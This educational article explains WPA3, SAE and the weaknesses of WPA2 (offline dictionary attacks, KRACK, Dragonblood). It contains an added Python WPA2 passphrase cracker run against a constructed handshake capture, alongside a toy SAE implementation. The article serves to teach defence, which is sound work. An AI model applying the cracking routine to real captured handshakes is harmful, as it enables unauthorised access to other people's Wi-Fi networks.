What Is WPA3? Is It “100%” Safe?
As a Wi-Fi user, you’ve surely encountered the term “WPA2”. WPA2 has been the most widespread technology for protecting Wi-Fi networks for more than a decade. If you would like to know more about it, you can check out our article, Tips on Choosing Security Mode for Your Wi-Fi, which introduces the evolution of 802.11 security in Chapter 2. But while WPA2 has been the prevailing choice for Wi-Fi security, times are changing. In 2018, the Wi-Fi Alliance announced the next generation of Wi-Fi security, WPA3.
What Is WPA3?
WPA3 (Wi-Fi Protected Access 3) is a security certification program introduced by the Wi-Fi Alliance in 2018. It builds on WPA2 and comes in two versions: WPA3-Personal (for homes) and WPA3-Enterprise (for businesses), each with its own set of improvements over the corresponding WPA2 mode.
- For WPA3-Personal, it strengthens authentication by replacing the Pre-Shared Key (PSK) authentication of WPA2-Personal with Simultaneous Authentication of Equals (SAE).
- For WPA3-Enterprise, it introduces an optional 192-bit security mode, a uniformly stronger cryptographic suite intended for government, defense, and industrial applications.
Why Is WPA3 Safer than WPA2?
You may have realized some of the flaws of WPA2 if you’ve read our article Tips on Choosing Security Mode for Your Wi-Fi. WPA3 was developed with the mission to fix the flaws found in WPA2. There are many details of how WPA3 enhances Wi-Fi security, and as mentioned above, the SAE and 192-bit security features are two major improvements.
Simultaneous Authentication of Equals
SAE is a password-based authentication and key-agreement method defined in IEEE 802.11-2016; it is a variant of the Dragonfly exchange of RFC 7664. It is the core of WPA3-Personal. In WPA3-Personal, the Wi-Fi Alliance replaces Pre-Shared Key (PSK) authentication with SAE, which brings the following benefits:
- Prevents offline dictionary attacks
Offline dictionary attacks are the main kind of attack against the WPA2 “4-way handshake”. In WPA2-Personal the Pairwise Master Key is derived directly from the passphrase and the SSID, and the 4-way handshake then sends the remaining key-derivation inputs (both MAC addresses and both nonces) plus a message integrity code (MIC) in the clear. An attacker who captures one handshake, even passively, therefore has everything needed to test passphrase guesses offline.
The cracking tool tries every string in a pre-arranged list (a dictionary), derives the keys for each candidate, and compares the resulting MIC with the captured one, without exchanging any messages with the AP, so the AP can neither notice nor throttle the attempts. In WPA2-Personal the only defense is a long, random passphrase, because it is unlikely to appear in any dictionary.
With SAE this attack is no longer possible: the passphrase is never used to derive the session key directly, and a captured exchange does not let an attacker test guesses against it offline. An attacker is limited to one password guess per live exchange with the AP or client (an online attack), and the AP can detect and rate-limit those.
This does not make weak passphrases safe. A passphrase like a birthday or phone number can still be guessed online given enough attempts, and the Dragonblood research (see below) showed that side channels in some implementations leaked enough to bring offline guessing back. Keep using a long passphrase with WPA3; SAE raises the cost of guessing it, it does not remove the need for it.
- Prevents KRACK attacks
Before October 2017, WPA2 was still considered reasonably safe: the worst that offline dictionary attacks usually meant was an unwanted visitor sharing your bandwidth. Key Reinstallation Attacks (KRACK) changed this.
When Mathy Vanhoef, a wireless security researcher, published the details of KRACK in October 2017, vendors across the industry had to ship patches. KRACK lets an attacker within radio range decrypt traffic that the victim believed was protected by WPA2, exposing data such as credit card numbers, passwords, emails, and photos unless it is also protected at a higher layer (for example by HTTPS).
Like offline dictionary attacks, KRACK exploits the WPA2 “4-way handshake”, but a different weakness in it. The AP and the client use the 4-way handshake to prove to each other that they hold the same master key and to install a fresh pairwise key that encrypts all subsequent traffic.
KRACK abuses the fact that the standard allowed message 3 of the handshake to be retransmitted. By positioning itself between the client and the AP (impersonating the AP toward the client) and replaying message 3, the attacker tricks the client into reinstalling a key that is already in use, which resets the nonce (packet counter) associated with that key. AES-CCMP is only secure when each nonce is used once, so the repeated keystream lets the attacker decrypt the affected traffic, and with the TKIP and GCMP ciphers also forge packets.
SAE does not abandon the 4-way handshake. In WPA3-Personal the client and the AP first run the Dragonfly exchange (RFC 7664) to agree on a fresh Pairwise Master Key, and then run the familiar 4-way handshake to derive the session keys from it. What closes the door on KRACK is the fix to the handshake state machine (never reinstalling a key that is already in use), which vendors patched in WPA2 and which the Wi-Fi Alliance added to its certification testing after KRACK, together with the Protected Management Frames that WPA3 makes mandatory. SAE's own contribution is different: a captured exchange no longer lets an attacker recover the password, and the master key is unique to every connection.
- Provides forward secrecy
So SAE defeats offline dictionary attacks. It also limits the damage if the passphrase is eventually compromised, through forward secrecy.
What is forward secrecy? In WPA2-Personal the session keys are derived from the passphrase and values sent in the clear, so anyone who learns the passphrase later (or cracks it) and has recorded earlier traffic can decrypt every one of those past sessions, not just future ones. In WPA3-Personal the session keys come from the fresh random values that SAE exchanges on every connection; they cannot be recomputed from the passphrase and a recording alone, so traffic captured in the past stays protected even if the passphrase leaks.
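To make concrete why the WPA2 handshake can be attacked offline (the first bullet above), here is an added example that is not from the original article: a minimal WPA2-Personal key derivation and MIC check in Python, run against a constructed handshake capture (made-up MAC addresses and nonces, and a simplified EAPOL-Key message 2 standing in for a real sniffed frame). Everything the cracker consumes is what a passive sniffer sees; it never sends a frame to the AP. This is the same computation that tools such as aircrack-ng and hashcat perform at scale.

```python
import hashlib
import hmac
from dataclasses import dataclass


# --- WPA2-Personal key derivation (IEEE 802.11-2016, clause 12.7) ---

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK, used directly as the PMK: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the SSID, 4096 rounds, 256 bits. Note that the SSID is public."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP (384 bits) via PRF-384: KCK(16) || KEK(16) || TK(16).
    Every input other than the PMK travels in the clear in the 4-way handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(3):
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """MIC of an EAPOL-Key frame for WPA2/CCMP: HMAC-SHA1 truncated to 128 bits,
    computed over the frame with its MIC field set to zero."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


@dataclass
class Handshake:
    """What a passive sniffer gets from messages 1 and 2 of the 4-way handshake."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol2: bytes   # message 2 with its MIC field zeroed
    mic: bytes      # the MIC field as transmitted


def build_capture(passphrase: str, ssid: str) -> Handshake:
    """Constructed sample capture: simulates a client joining with the given
    passphrase so the demo runs offline. Addresses and nonces are made up."""
    ap_mac = bytes.fromhex("0013378a0001")
    sta_mac = bytes.fromhex("0013378b0002")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    # Simplified EAPOL-Key message 2: EAPOL header, descriptor/key-info fields,
    # replay counter, SNonce, then a zeroed 16-byte MIC field (real frames carry
    # more fields, but the MIC is computed the same way).
    eapol2 = b"\x02\x03\x00\x75\x02\x01\x0a" + b"\x00" * 8 + snonce + b"\x00" * 16
    ptk = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol2,
                     eapol_mic(ptk[:16], eapol2))


def crack_psk(capture: Handshake, wordlist):
    """Offline dictionary attack: test each candidate passphrase against the
    captured MIC without sending a single frame to the AP."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, capture.ssid)
        ptk = derive_ptk(pmk, capture.ap_mac, capture.sta_mac,
                         capture.anonce, capture.snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], capture.eapol2), capture.mic):
            return candidate
    return None


if __name__ == "__main__":
    cap = build_capture("sunshine2018", "HomeNet")   # the victim used a weak passphrase
    print(crack_psk(cap, ["password", "12345678", "sunshine2018", "letmein"]))
```

The cost per guess is one PBKDF2 computation, which is why the passphrase length, not anything in the protocol, decides how long WPA2-Personal holds out. With SAE the captured exchange contains no value that a guessed passphrase can be checked against in this way.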
To ensure a smooth transition from WPA2 to WPA3, the Wi-Fi Alliance designed a transition mode for SAE: WPA3-Personal Transition Mode. This mode allows WPA2-Personal and WPA3-Personal to operate simultaneously on a single wireless network: the AP advertises both, and each client uses WPA3 if it supports it and WPA2 otherwise. The price is that a WPA3-capable client can be tricked into a WPA2 connection (a downgrade, one of the Dragonblood attacks), so switch to WPA3-only mode once all of your clients support it.
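The Commit/Confirm exchange that SAE runs, as an added example that is not part of the original article or of any vendor's code: a Python implementation of the Dragonfly exchange of RFC 7664 over a MODP group. The prime is assumed to be the 1024-bit RFC 2409 group 2 value (chosen because the arithmetic then needs only pow(); real SAE defaults to the NIST P-256 curve, and 1024-bit MODP is too weak for production), the key hierarchy is simplified, and the MAC addresses are made up. Running it with a wrong password on one side models the single online guess an attacker gets per exchange; running it twice with the right password shows that the PMK is fresh each time, which is the forward-secrecy property discussed above.

```python
import hashlib
import hmac
import secrets

# 1024-bit MODP prime of RFC 2409 group 2 (assumed transcription of the RFC
# value). It is a safe prime, so the prime-order subgroup has order q = (p-1)/2.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF", 16)
Q = (P - 1) // 2
AP_MAC = bytes.fromhex("0013378a0001")    # made-up addresses for the demo
STA_MAC = bytes.fromhex("0013378b0002")


def password_element(password: bytes, mac_a: bytes, mac_b: bytes) -> int:
    """Hunting-and-pecking for a MODP group (RFC 7664 section 3.2.1): hash the
    password with both identities and a counter until a usable element appears.
    With a safe prime the exponent (p-1)/q is 2, so PE = seed^2 mod p, which
    lands in the order-q subgroup. (The RFC stretches the seed to the length of
    p with a KDF; a single SHA-256 is used here for brevity.)"""
    base = max(mac_a, mac_b) + min(mac_a, mac_b) + password
    for counter in range(1, 256):
        seed = int.from_bytes(hashlib.sha256(base + bytes([counter])).digest(), "big")
        pe = pow(seed, (P - 1) // Q, P)
        if pe > 1:
            return pe
    raise RuntimeError("no password element found")


def _enc(scalar: int, element: int) -> bytes:
    return scalar.to_bytes(128, "big") + element.to_bytes(128, "big")


class Party:
    """One side of the exchange (AP or station); both run identical code."""

    def __init__(self, mac: bytes, peer_mac: bytes, password: bytes):
        self.mac, self.peer_mac = mac, peer_mac
        self.pe = password_element(password, mac, peer_mac)
        # Fresh secrets for every exchange; they never leave this object.
        while True:
            self.rand = 2 + secrets.randbelow(Q - 2)
            self.mask = 2 + secrets.randbelow(Q - 2)
            self.scalar = (self.rand + self.mask) % Q
            if self.scalar > 1:
                break
        # element = PE^(-mask); in a group of order q that is PE^(q - mask).
        self.element = pow(self.pe, Q - self.mask, P)

    def commit(self):
        """Commit message: (scalar, element). Sent in the clear."""
        return self.scalar, self.element

    def receive_commit(self, peer_scalar: int, peer_element: int) -> bytes:
        """Process the peer's Commit, derive keys, and return our Confirm."""
        self.peer_scalar, self.peer_element = peer_scalar, peer_element
        # (PE^peer_scalar * peer_element)^rand = PE^(peer_rand * rand): the peer's
        # mask cancels, and the result needs both sides' secret rand values.
        shared = pow(pow(self.pe, peer_scalar, P) * peer_element % P, self.rand, P)
        ss = shared.to_bytes(128, "big")
        # Simplified key hierarchy: a confirm key (KCK) and the PMK handed to the
        # 4-way handshake. 802.11 also mixes in the scalars; the idea is the same.
        self.kck = hashlib.sha256(b"SAE KCK" + ss).digest()
        self.pmk = hashlib.sha256(b"SAE PMK" + ss).digest()
        msg = _enc(self.scalar, self.element) + _enc(peer_scalar, peer_element)
        return hmac.new(self.kck, msg, hashlib.sha256).digest()

    def verify(self, peer_confirm: bytes) -> bool:
        """Check the peer's Confirm: it matches only if the peer derived the same
        KCK, i.e. used the same password."""
        msg = _enc(self.peer_scalar, self.peer_element) + _enc(self.scalar, self.element)
        expected = hmac.new(self.kck, msg, hashlib.sha256).digest()
        return hmac.compare_digest(expected, peer_confirm)


def run_sae(ap_password: bytes, sta_password: bytes):
    """Run one full Commit/Confirm exchange. Returns (authenticated, ap_pmk, sta_pmk).
    A wrong sta_password models an active attacker's single online guess."""
    ap = Party(AP_MAC, STA_MAC, ap_password)
    sta = Party(STA_MAC, AP_MAC, sta_password)
    ap_confirm = ap.receive_commit(*sta.commit())
    sta_confirm = sta.receive_commit(*ap.commit())
    ok = ap.verify(sta_confirm) and sta.verify(ap_confirm)
    return ok, ap.pmk, sta.pmk


if __name__ == "__main__":
    ok, k1, k2 = run_sae(b"correct horse battery", b"correct horse battery")
    print("authenticated:", ok, "| same PMK on both sides:", k1 == k2)
    ok, _, _ = run_sae(b"correct horse battery", b"password123")
    print("wrong-password guess accepted:", ok)
    _, k3, _ = run_sae(b"correct horse battery", b"correct horse battery")
    print("second session reuses the PMK:", k1 == k3)
```

A passive observer sees both scalars and both elements. Recovering the shared value from them requires combining PE^rand of one side with PE^rand of the other, a Diffie-Hellman problem, so a password guess cannot be checked against the transcript; the only check available is the live Confirm, one guess per exchange. The same property gives forward secrecy: the rand values are discarded after the exchange, so a later leak of the password does not reproduce any earlier PMK.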
192-bit security
192-bit security aims to give enterprise networks a uniformly strong cryptographic suite. It is new in WPA3-Enterprise and optional. Despite the name it is not a 192-bit cipher: the mode mandates a consistent set of algorithms at the 192-bit security level, namely AES-256 in GCM mode (GCMP-256) for data, HMAC-SHA-384 for key derivation, and 384-bit elliptic-curve (or at least 3072-bit RSA) keys for the EAP-TLS authentication, in place of the 128-bit-level defaults of WPA2-Enterprise. Requiring the whole suite at once matters because the weakest component sets the security level of the network.
WPA3-Enterprise does not have a transition mode comparable to WPA3-Personal's. Its base mode keeps the 802.1X/EAP authentication of WPA2-Enterprise (adding mandatory Protected Management Frames), and 192-bit security is an optional, separately configured mode, so the underlying WPA2 protocols are neither changed nor replaced.
Is WPA3 “100%” Safe?
With the help of SAE and 192-bit security, WPA3 provides higher security for both homes and businesses. But is WPA3 “100%” safe?
No.
In 2019 Mathy Vanhoef, who discovered KRACK, and Eyal Ronen published Dragonblood, which found two kinds of flaws in WPA3. The first are downgrade attacks: in WPA3-Personal Transition Mode an attacker can push a client into a WPA2 handshake and then run the usual offline dictionary attack, and some implementations could also be forced onto weaker Dragonfly groups. The second are side-channel leaks in the hunting-and-pecking loop that derives the password element: its number of iterations and its memory-access pattern depend on the password, which leaks enough to drive an offline dictionary attack after all. Most of these were implementation issues that vendors patched, and because WPA3 was still rolling out, engineers could fix them before it was widely deployed. The practical advice is to keep AP and client firmware up to date and to prefer WPA3-only mode where your devices allow it.
Extended Reading
Along with WPA3, the Wi-Fi Alliance also announced two certification programs that help enhance Wi-Fi security: Easy Connect and Enhanced Open. They were originally included in the WPA3 program but were later taken out as two separate certification programs.
- The Easy Connect feature (based on the Device Provisioning Protocol, DPP) gives devices with limited or no user interface, like smart bulbs and printers, a secure way to be added to the network, for example by scanning the device's QR code with a phone.
- The Enhanced Open feature (based on Opportunistic Wireless Encryption, OWE, RFC 8110) encrypts traffic on open networks such as public hotspots without requiring a password, so other users of the hotspot cannot passively read it. It does not authenticate the access point, so it is no defense against a rogue AP.
References
[1] IEEE Computer Society, “IEEE Standard for Information Technology– Telecommunications and Information Exchange Between Systems – Local and Metropolitan Area Networks – Specific requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications,” (IEEE Std. 802.11-2016), March 2016
[2] Wi-Fi Alliance, “Wi-Fi CERTIFIED WPA3™ Technology Overview”, June 2018
[3] Wi-Fi Alliance, “Wi-Fi Protected Access® Security for Wi-Fi® Networks”, https://www.wi-fi.org/download.php?file=/sites/default/files/private/Wi-Fi%20Security%20Highlights.pdf
[4] Wi-Fi Alliance, “Discover Wi-Fi--Security”, https://www.wi-fi.org/discover-wi-fi/security
[5] RFC 7664, Dragonfly Key Exchange, November 2015, https://tools.ietf.org/html/rfc7664
[6] Mathy Vanhoef & Eyal Ronen, “DRAGONBLOOD: Analysing WPA3's Dragonfly Handshake”, https://wpa3.mathyvanhoef.com/
[7] Mathy Vanhoef, “Key Reinstallation Attacks: Breaking WPA2 by forcing nonce reuse”, 2017, https://www.krackattacks.com/